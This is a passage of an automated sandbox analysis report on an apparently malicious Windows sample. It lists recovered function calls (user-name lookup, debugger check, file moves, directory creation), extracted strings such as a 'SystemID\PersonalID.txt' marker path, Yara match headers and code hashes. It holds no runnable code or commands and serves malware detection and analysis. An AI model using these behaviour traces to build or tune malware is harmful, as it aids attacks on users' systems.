                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 2901542994-0
                                                                                      • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                      • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                      • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                      • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                        • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                      • __calloc_crt.LIBCMT ref: 00425A01
                                                                                        • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                      • __lock.LIBCMT ref: 00425A37
                                                                                      • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                      • __lock.LIBCMT ref: 00425A57
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                      • String ID:
                                                                                      • API String ID: 2580527540-0
                                                                                      • Opcode ID: 56ddee5d44e6f7a0727bbfe56c98386f43bba55fcc517f11197347c165fc7d9b
                                                                                      • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                      • Opcode Fuzzy Hash: 56ddee5d44e6f7a0727bbfe56c98386f43bba55fcc517f11197347c165fc7d9b
                                                                                      • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                      • String ID:
                                                                                      • API String ID: 3016257755-0
                                                                                      • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                      • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                      • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                      • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32 ref: 004127B9
                                                                                      • _malloc.LIBCMT ref: 004127C3
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _memset.LIBCMT ref: 004127CE
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2824100046-0
                                                                                      • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                      • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                      • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                      • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32 ref: 00412806
                                                                                      • _malloc.LIBCMT ref: 00412814
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _memset.LIBCMT ref: 0041281F
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2824100046-0
                                                                                      • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                      • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                      • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                      • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                      • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                      • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                      • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                        • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                        • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                        • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                        • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                        • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                        • Part of subcall function 0041BA10: RegisterClassExW.USER32 ref: 0041BA73
                                                                                        • Part of subcall function 0041BA80: CreateWindowExW.USER32 ref: 0041BAAD
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                      • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                      • DispatchMessageW.USER32 ref: 0041B4D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                      • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                      • API String ID: 441990211-897913220
                                                                                      • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                      • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                      • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                      • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .\crypto\err\err.c$unknown
                                                                                      • API String ID: 0-565200744
                                                                                      • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                      • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                      • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                      • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0042419D
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DebuggerPresent_memset
                                                                                      • String ID: i;B
                                                                                      • API String ID: 2328436684-472376889
                                                                                      • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                      • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                      • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                      • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                      • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                      • String ID: 8Q
                                                                                      • API String ID: 3761405300-2096853525
                                                                                      • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                      • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                      • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                      • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fputws$CreateDirectory
                                                                                      • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                      • API String ID: 2590308727-54166481
                                                                                      • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                      • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                      • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                      • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt
                                                                                      • String ID: Assertion failed: %s, file %s, line %d
                                                                                      • API String ID: 3494438863-969893948
                                                                                      • Opcode ID: 1dd0bcc786bd9354787a1f3cd336883f869f594dd0932d9161717ffb1dcc9abd
                                                                                      • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                      • Opcode Fuzzy Hash: 1dd0bcc786bd9354787a1f3cd336883f869f594dd0932d9161717ffb1dcc9abd
                                                                                      • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00480686
                                                                                        • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                      Strings
                                                                                      • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                      • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset_raise
                                                                                      • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                      • API String ID: 1484197835-3867593797
                                                                                      • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                      • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                      • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                      • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0044F251
                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                      • String ID: TeM
                                                                                      • API String ID: 757275642-2215902641
                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%